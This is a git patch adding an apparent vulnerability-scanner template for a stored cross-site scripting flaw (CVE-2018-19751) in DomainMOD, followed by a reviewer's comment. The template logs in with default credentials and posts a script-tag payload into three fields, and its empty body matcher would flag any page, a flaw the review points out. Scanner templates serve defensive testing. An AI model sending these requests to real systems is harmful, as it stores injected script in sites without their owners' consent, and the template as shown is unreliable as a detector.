From 90fddf682cecf339a8dc255f71f6aa4289035692 Mon Sep 17 00:00:00 2001
From: Arafat Ansari <54571841+arafatansari@users.noreply.github.com>
Date: Fri, 8 Jul 2022 01:33:32 +0530
Subject: [PATCH] Create CVE-2018-19751.yaml

---
 CVE-2018-19751.yaml | 61 +++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 61 insertions(+)
 create mode 100644 CVE-2018-19751.yaml

diff --git a/CVE-2018-19751.yaml b/CVE-2018-19751.yaml
new file mode 100644
index 0000000000..3b6c167aaa
--- /dev/null
+++ b/CVE-2018-19751.yaml
@@ -0,0 +1,61 @@
+id: CVE-2018-19751
+
+info:
+  name: DomainMOD 4.11.01 - '/admin/ssl-fields/add.php' Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /admin/ssl-fields/add.php Display Name, Description & Notes fields parameters.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19751
+    - https://www.exploit-db.com/exploits/45947/
+
+  metadata:
+    verified: true
+  tags: wbcecms,xss
+
+requests:
+  - raw:
+
+      - |
+        POST /domain/ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        new_username=admin&new_password=admin123
+
+      - |
+        POST /domain/admin/ssl-fields/add.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Origin: https://{{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
+        Cache-Control: max-age=0
+        Upgrade-Insecure-Requests: 1
+
+        new_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&new_field_name=new&new_field_type_id=1&new_description=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&new_notes=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
+
+      - |
+        GET /domain/assets/categories.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+
+    cookie-reuse: true
+    matchers-condition: and
+    redirects: true
+    max-redirects: 3
+    matchers:
+      - type: word
+        part: body
+        words:
+          - ""
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
\ No newline at end of file
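Review bot: The body matcher's word is an empty string (`- ""`), and an empty substring is contained in every response body, so together with the `text/html` header and `200` status matchers this template would flag any page the authenticated session can load as vulnerable; if the empty value is only an artifact of how this page was extracted and the real template carries the payload, the line should read `- "<script>alert(1)</script>"`, otherwise this is a false-positive-on-everything detection and needs fixing before merge. The login request hard-codes `new_username=admin&new_password=admin123` and every path is rooted at `/domain/`, so the template only works against installs with those default credentials under that exact base path — this precondition belongs in `description:` (and ideally the credentials become template variables so authenticated scans can supply real ones). The second request appears to persist the payload into the target's SSL-field records via add.php, an intrusive side effect that should also be called out in the description, and the verification GET fetches `/domain/assets/categories.php` rather than an ssl-fields page, so it is worth confirming that the stored Display Name is actually rendered there. Finally `tags: wbcecms,xss` names a different product; `tags: domainmod,xss,authenticated` matches the software in `name:`.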